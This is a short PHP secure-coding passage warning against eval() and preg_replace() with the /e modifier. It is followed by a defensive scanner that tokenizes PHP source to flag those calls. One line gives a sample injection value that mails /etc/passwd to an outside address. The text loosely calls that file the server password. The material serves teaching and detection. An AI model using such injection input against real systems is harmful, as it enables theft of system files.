eval() has aliases. The preg_replace() function with the /e option also calls eval() on PHP code, so do not use the /e option with preg_replace(), especially if you use any user-entered data in the calls.
So what does eval do? In eval ( string $code_str ), eval evaluates the string given in code_str as PHP code. Imagine you get a form username input field value using eval($_POST['username']). If the hacker types the following value in the input field:
mail("email@example.com", "Some passwords", '/bin/cat /etc/passwd')
you will be sending your server password to the hacker.
So don’t use eval unless you are suicidal. ;)
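To find the two sinks named above in an existing code base, the sketch below tokenizes PHP source and reports eval() calls and preg_replace() calls whose literal pattern carries the /e modifier. It is an added example, not code from the original page; find_eval_sinks() and $sample are hypothetical names, and the sample source is constructed for illustration.

```php
<?php
// Added example: report eval() and preg_replace() with the /e modifier.
// find_eval_sinks() is a hypothetical helper; $sample below is constructed input.
function find_eval_sinks(string $source): array
{
    $skip = [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];
    // Drop whitespace and comments so neighbouring tokens can be compared directly.
    $tokens = array_values(array_filter(
        token_get_all($source),
        fn($t) => !is_array($t) || !in_array($t[0], $skip, true)
    ));
    $findings = [];
    foreach ($tokens as $i => $tok) {
        if (!is_array($tok)) {
            continue; // single-character token such as "(" or ";"
        }
        [$id, $text, $line] = $tok;
        if ($id === T_EVAL) {
            $findings[] = "line $line: eval()";
            continue;
        }
        // Only preg_replace( '<literal pattern>' ... ) is inspected further.
        $arg = $tokens[$i + 2] ?? null;
        if ($id !== T_STRING || strtolower($text) !== 'preg_replace'
            || ($tokens[$i + 1] ?? null) !== '('
            || !is_array($arg) || $arg[0] !== T_CONSTANT_ENCAPSED_STRING) {
            continue;
        }
        $pattern = (string) substr($arg[1], 1, -1); // strip the PHP quotes
        if ($pattern === '') {
            continue;
        }
        // Modifiers are whatever follows the closing regex delimiter.
        $close = strtr($pattern[0], '([{<', ')]}>');
        $end = strrpos($pattern, $close);
        if ($end !== false && strpos(substr($pattern, $end + 1), 'e') !== false) {
            $findings[] = "line $line: preg_replace() with /e modifier";
        }
    }
    return $findings;
}

$sample = <<<'PHP'
<?php
eval($_POST['username']);
echo preg_replace('/\{(\w+)\}/e', 'strtoupper("$1")', $tpl);
echo preg_replace('/\s+/', ' ', $tpl);
echo preg_replace_callback('/\{(\w+)\}/', 'my_upper', $tpl);
PHP;

print_r(find_eval_sinks($sample));
```

Only patterns written as string literals are checked, so a pattern assembled at run time still needs manual review. The last sample line shows preg_replace_callback(), which passes matches to a function instead of evaluating a string and is therefore not reported.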